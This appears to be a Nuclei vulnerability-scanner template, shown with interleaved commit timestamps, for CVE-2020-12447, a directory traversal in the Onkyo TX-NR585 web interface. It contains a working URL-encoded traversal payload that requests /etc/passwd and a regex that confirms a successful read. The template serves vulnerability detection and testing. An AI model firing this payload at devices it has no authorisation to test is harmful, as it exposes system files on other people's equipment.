2022-02-05 01:44:15 +00:00
id : CVE-2020-12447
2022-04-22 10:38:41 +00:00
2022-02-05 01:44:15 +00:00
info :
name : Onkyo TX-NR585 Web Interface - Directory Traversal
author : 0x_Akoko
severity : high
2022-05-17 09:18:12 +00:00
description : Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.
2022-02-05 01:44:15 +00:00
reference :
- https://blog.spookysec.net/onkyo-lfi
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-12447
2022-05-17 09:18:12 +00:00
- https://blog.spookysec.net/onkyo-lfi/
2022-02-05 01:44:15 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2020-12447
cwe-id : CWE-22
2022-02-07 19:05:52 +00:00
tags : cve,cve2020,onkyo,lfi,traversal
2022-02-05 01:44:15 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/04